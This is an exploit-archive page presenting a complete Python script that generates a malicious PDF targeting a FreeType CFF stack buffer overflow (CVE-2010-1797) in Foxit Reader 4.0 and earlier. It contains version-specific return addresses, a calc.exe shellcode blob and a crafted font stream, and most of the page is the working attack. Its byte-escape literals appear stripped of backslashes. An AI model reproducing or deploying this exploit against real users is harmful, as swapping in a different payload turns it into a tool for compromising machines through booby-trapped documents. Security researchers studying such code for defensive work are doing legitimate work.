Foxit Reader <= 4.0 pdf Jailbreak Exploit

Posted on 24 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Foxit Reader &lt;= 4.0 pdf Jailbreak Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================
Foxit Reader &lt;= 4.0 pdf Jailbreak Exploit
=========================================

import sys,zlib

def getFFShellcode(sc):
   ff_sc = ''
   if len(sc)%4 != 0:
      sc += (4-len(sc)%4)*'x00' 
   for i in range(0,len(sc),4):
      ff_sc += 'xff'+sc[i+3]+sc[i+2]+sc[i+1]+sc[i]
   return ff_sc 

outputHeader = '''
##############################################################################################
# FreeType Compact Font Format (CFF) Multiple Stack Based Buffer Overflow (CVE-2010-1797)    #
##############################################################################################
#                                                                                            #
# Product: Foxit Reader &lt;= 4.0                                                               #
# Platforms: Windows XP, Windows Vista                                                       #
# Author: Jose Miguel Esparza &lt;jesparza AT eternal-todo DOT com&gt;                             #
# Web: http://eternal-todo.com                                                               #
# Date: 2010-08-23                                                                           #
#                                                                                            #
##############################################################################################
'''
outputFileName = 'foxit_type2_poc.pdf'
usage = 'Usage: '+sys.argv[0]+' target

Targets:
	0 - Foxit Reader &gt; 3.0
	1 - Foxit Reader 3.0
	2 - Other versions'

COMEX_PDF_TEMPLATE = '''%PDF-1.3
%xbexbexbaxba
4 0 obj 
&lt;&lt; /Length 631 &gt;&gt;
stream
q Q q 18 750 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT 0.0003 Tc
7 0 0 -7 534.7051 -768 Tm /F2.0 1 Tf [ (4/15/10 8:01 P) 1 (M) ] TJ ET Q q 
1 0 0 -1 0 0 cm BT 7 0 0 -7 18 -768 Tm /F2.0 1 Tf [ (d) -0.4 (a) -0.2 (ta)
-0.2 (:) -0.4 (te) -0.1 (x) -0.3 (t/) -0.4 (h) 0.4 (tm) 0.4 (l) -0.1 (,) -0.4
( ) ] TJ ET Q Q q 18 40 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT
-0.0003 Tc 7 0 0 -7 555.6299 -43 Tm /F2.0 1 Tf [ (Pa) -1 (ge ) -1 (1) -1 ( ) 
-1 (o) -1 (f ) -1 (1) ] TJ ET Q Q q 18 190 576 560 re W n /Cs1 cs 1 1 1 sc
18 190 576 560 re f 0 0 0 sc q 0.8 0 0 -0.8 18 750 cm BT 16 0 0 -16 8 22 Tm
/F2.0 1 Tf ( ) Tj ET Q Q 
endstream
endobj
2 0 obj 
&lt;&lt; /Type /Page /Parent 3 0 R /Resources 5 0 R /Contents 4 0 R /MediaBox [0 0 612 792]
&gt;&gt;
endobj
5 0 obj 
&lt;&lt; /ProcSet [ /PDF /Text ] /ColorSpace &lt;&lt; /Cs1 6 0 R &gt;&gt; /Font &lt;&lt; /F2.0 8 0 R &gt;&gt; &gt;&gt;
endobj
3 0 obj 
&lt;&lt; /Type /Pages /MediaBox [0 0 612 792] /Count 1 /Kids [ 2 0 R ] &gt;&gt;
endobj
7 0 obj 
&lt;&lt; /Type /Catalog /Pages 3 0 R &gt;&gt;
endobj
11 0 obj 
&lt;&lt;
/Subtype/Type1C
/Filter[/FlateDecode]
/Length $CFF_STREAM_LENGTH
&gt;&gt;
stream
$CFF_STREAM
endstream
endobj
9 0 obj
&lt;&lt; /Type /FontDescriptor /Ascent 750 /CapHeight 676 /Descent -250 /Flags 32
/FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+Times-Roman /ItalicAngle
0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 11 0 R &gt;&gt;
endobj
10 0 obj
[ 556 ]
endobj
8 0 obj
&lt;&lt; /Type /Font /Subtype /Type1 /BaseFont /CSDIZD+Times-Roman /FontDescriptor
9 0 R /Widths 10 0 R /FirstChar 32 /LastChar 32 /Encoding /MacRomanEncoding
&gt;&gt;
endobj
1 0 obj
&lt;&lt; &gt;&gt;
endobj
xref
0 12
0000000000 65535 f
0000017767 00000 n
0000000408 00000 n
0000003397 00000 n
0000000022 00000 n
0000000389 00000 n
0000000512 00000 n
0000003361 00000 n
0000017359 00000 n
0000007240 00000 n
0000000622 00000 n
0000003340 00000 n
trailer
&lt;&lt; /Size 12 /Root 7 0 R /Info 1 0 R &gt;&gt;
startxref
17942
%%EOF
'''

MAX_FF_SECTION_LEN = 45*5
JUMP_BYTE = ['xcd','xcc']
POP_POP_RET_ADDRESS = ['x00x40x11x85','x00x40xcex36'] # Foxit reader addresses, depending on the version
NUM_SECOND_INSTRUCTIONS_SET = [183,182]

# calc.exe shellcode
shellcode = 'x68x10xf5x00x00x31xf6x64x8bx76x30x8bx76x0cx8bx76x1cx8bx6ex08x8bx36x8bx5dx3cx8bx5cx1dx78x01xebx8bx4bx18x67xe3xecx8bx7bx20x01xefx8bx7cx8fxfcx01xefx31xc0x99x32x17x66xc1xcax01xaex75xf7x58x66x3bxd0x50xe0xe2x75xccx8bx53x24x01xeax0fxb7x14x4ax8bx7bx1cx01xefx03x2cx97x66x3dx10xf5x75x0ex33xc0x50x68x2ex65x78x65x68x63x61x6cx63x54xffxd5x68x06xcbx00x00xebx92'

cff_header = 'x01x00x04x01x00x01x01x01x13ABCDEF+Times-Romanx00x01x01x01x1fxf8x1bx00xf8x1cx02xf8x1dx03xf8x19x04x1cox00
xfb&lt;xfbnxfa|xfax16x05xe9x11x8bx8bx12x00x03x01x01x08x13x18001.007Times RomanTimesx00x00x00x02x04x00x00x00x01x00x00x00x05x00x00x04xdc'

if len(sys.argv) &gt; 2 or (len(sys.argv) == 2 and not sys.argv[1].isdigit()) or len(sys.argv) == 1:
   sys.exit(usage)

version = int(sys.argv[1])
if version == 2:
   sys.exit('Versions &lt; 3.0 are not implemented, try it!! ;)
')
if version &gt; 2:
   sys.exit(usage)

print outputHeader
print '[-] Creating PDF file...'
# Building the FF section
ff_shellcode = getFFShellcode(shellcode)
ff_zero_bytes = 'xffx00x00x00x00'
ff_instructions = ff_zero_bytes*11 + ff_shellcode + ((MAX_FF_SECTION_LEN - len(ff_shellcode) - 55 - 5*5)/5) * ff_zero_bytes + 'xffx90x90x8axeb' + 'xff'+POP_POP_RET_ADDRESS[version] + ('xffx00'+JUMP_BYTE[version]+'x00x00')*3 
if len(ff_instructions) &gt; MAX_FF_SECTION_LEN:
   sys.exit('[x] FF section bigger than expected!!')

# Operators sections
first_instructions_set = 'x0cx17x0cx17x0cx04x0cx1d' * 20
second_instructions_set = 'x0cx17x0cx1d' * NUM_SECOND_INSTRUCTIONS_SET[version]
third_instructions_set = 'x0cx1dx0cx12' * 42

# Building the full CFF content for the fake charstring
cff_content = cff_header + 'x0e'*4 + ff_instructions + first_instructions_set + second_instructions_set + third_instructions_set + ff_zero_bytes + 'x0e'
# Decoding with FlateDecode
encoded_cff_content = zlib.compress(cff_content)

# Creating the PDF based on the Comex PDF, slightly modified
pdf_content = COMEX_PDF_TEMPLATE
pdf_content = pdf_content.replace('$CFF_STREAM_LENGTH',str(len(encoded_cff_content)))
pdf_content = pdf_content.replace('$CFF_STREAM',encoded_cff_content)
open(outputFileName,'w').write(pdf_content)
print '[+] File &quot;'+outputFileName+'&quot; created, test it!!'


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

None in database
Last 20
Exploits :

Last 20